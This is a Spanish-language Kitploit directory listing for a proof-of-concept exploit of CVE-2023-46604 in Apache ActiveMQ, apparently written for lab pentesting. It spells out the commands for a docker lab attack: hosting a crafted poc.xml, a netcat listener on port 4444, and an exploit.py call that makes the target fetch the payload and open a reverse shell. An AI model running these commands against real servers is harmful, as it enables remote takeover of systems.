Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-46604 — Exploit de PoC para CVE-2023-46604 dirigido a Apache ActiveMQ, que entrega una reverse shell mediante una carga XML manipulada a través de HTTP. | Kitploit
Herramientas/GitHubGitHub/cuanh2333/cve-2023-46604
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónHerramienta de Acceso Remoto
GitHubcuanh2333/cve-2023-46604

CVE-2023-46604

Exploit de PoC para CVE-2023-46604 dirigido a Apache ActiveMQ, que entrega una reverse shell mediante una carga XML manipulada a través de HTTP.

Ver Repositorio
1hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2023-46604

image

Construir docker-compose que contenga 2 imágenes: la máquina víctima y la máquina objetivo según el entorno requerido En la máquina víctima, iniciar ActiveMQ

Cambiar a la máquina atacante: • Abrir el servicio HTTP para enviar el PoC: python3 -m http.server

• Usar netcat para escuchar la conexión hacia la máquina atacante nc -nlvp 4444

• Enviar el payload para crear una conexión reverse shell a la máquina atacante python3 exploit.py -i 172.18.0.3 -p 61616 --xml http://172.18.0.2:8000/poc.xml Donde:

  • Exploit.py: archivo de código de explotación de la vulnerabilidad
  • -I 172.18.0.3: Dirección IP de la máquina que envía el payload
  • -p 61616: Puerto en el que ActiveMQ de la máquina víctima está escuchando
  • --xml http://172.18.0.2:8000/poc.xml: URL del archivo poc.xml en la máquina atacante

Se puede observar que, después de ejecutar el comando para ejecutar el archivo ‘exploit.py’, el código de explotación enviará un paquete ‘poc.xml’ en el servidor web hacia el objetivo, que es la dirección del servicio ActiveMQ que se ejecuta en el servidor objetivo. Al mismo tiempo, el servidor web HTTP en la máquina atacante también recibe una solicitud enviada desde la dirección IP de la máquina objetivo.

Después de enviar el payload, cambie al terminal que está escuchando en el puerto 4444 de la máquina atacante. Vemos que el reverse shell de la máquina víctima ha sido enviado.

Descargar herramienta